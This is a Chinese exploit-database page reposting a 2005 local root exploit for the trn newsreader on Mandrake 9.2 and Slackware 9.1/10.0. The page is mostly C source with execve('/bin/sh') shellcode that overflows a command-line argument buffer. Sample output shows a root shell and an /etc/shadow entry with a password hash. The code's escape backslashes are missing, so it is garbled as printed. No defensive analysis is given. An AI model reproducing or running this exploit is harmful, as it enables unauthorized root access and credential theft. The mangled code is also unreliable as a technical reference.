Mandrake / Slackware /usr/bin/trn – Local Privilege Escalation (Not SUID)
漏洞ID | 1054873 | 漏洞类型 | |
发布时间 | 2005-01-26 | 更新时间 | 2005-01-26 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
/usr/bin/trn local root exploit
By ZzagorR - http://www.rootbinbash.com
*/
/*
sh-2.05b$ ./trn
usage : ./trn ret buf
example : ./trn 0xbfffff64
[+] mandrake 9.2 = 0xbfffff96
[+] slackware 10.0.0= 0xbfffff98
[+] slackware 9.1.0= 0xbfffff84
sh-2.05b$
sh-2.05b$ ./trn 0xbfffff84 128
[BOO %] 128
[RET %] bfffff84
sh-2.05b#
sh-2.05b# id
uid=0(root) gid=98(nobody) groups=98(nobody)
sh-2.05b# cat /etc/shadow
root:$1$N88/N.aP$dBWcFHiYCXXNb77Y5LPNK1:12705:0:::::
TEST :
MANDRAKE 9.2
SLACKWARE 10.0.0
SLACKWARE 9.1.0
http://www.rootbinbash.com/d0kum4n/trn-test.txt
BOO:
$trn `perl -e 'print "A" x 120'`
$trn `perl -e 'print "A" x 124'`
$trn `perl -e 'print "A" x 128'`
Segmentation fault
BOO=128
*/
#include <stdio.h>
#include <string.h>
#define NEREDE "/usr/bin/trn"
char caylarbeles[] =
"x31xc0x31xdbxb0x17xcdx80"
"x31xc0x50x68x2fx2fx73x68"
"x68x2fx62x69x6ex89xe3x50"
"x53x89xe1x99xb0x0bxcdx80";
int main(int argc, char *argv[]){
int bizim;
char bufe[1000];
char *tayfasi;
if (argc < 3) {
printf ("{ trn l0c4l r00t 3xpl01t }n");
printf ("{ By ZzagorR - http://www.rootbinbash.com }n");
printf ("{ usage : %s ret buf }n",argv[0]);
printf ("{ example : %s 0xbfffff99 142 }n",argv[0]);
printf ("{ mandrake 9.2 = 0xbfffff96 }n");
printf ("{ slackware 10.0.0 = 0xbfffff98 }n");
printf ("{ slackware 9.1.0 = 0xbfffff84 }n");
exit(1);
}else{
unsigned long RET=strtoul(argv[1], NULL, 16);
int BOO = atoi(argv[2]);
printf ("[BOO %] %in",BOO);
printf ("[RET %] %xn",RET);
tayfasi = bufe;
memset(bufe, 0x41,256-strlen(caylarbeles));
sprintf(bufe+256-strlen(caylarbeles), "%s", caylarbeles);
for ( bizim = BOO; bizim <= BOO+4; bizim+= 4 )
*(long*)(tayfasi+bizim) = RET;
execl(NEREDE, NEREDE , bufe, NULL);
}
}
// milw0rm.com [2005-01-26]
相关推荐: RedHat 9.0 / Slackware 8.1 – ‘/bin/mail’ Carbon Copy Field Buffer Overrun
RedHat 9.0 / Slackware 8.1 – ‘/bin/mail’ Carbon Copy Field Buffer Overrun 漏洞ID 1053913 漏洞类型 发布时间 2003-05-30 更新时间 2003-05-30 CVE编号 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666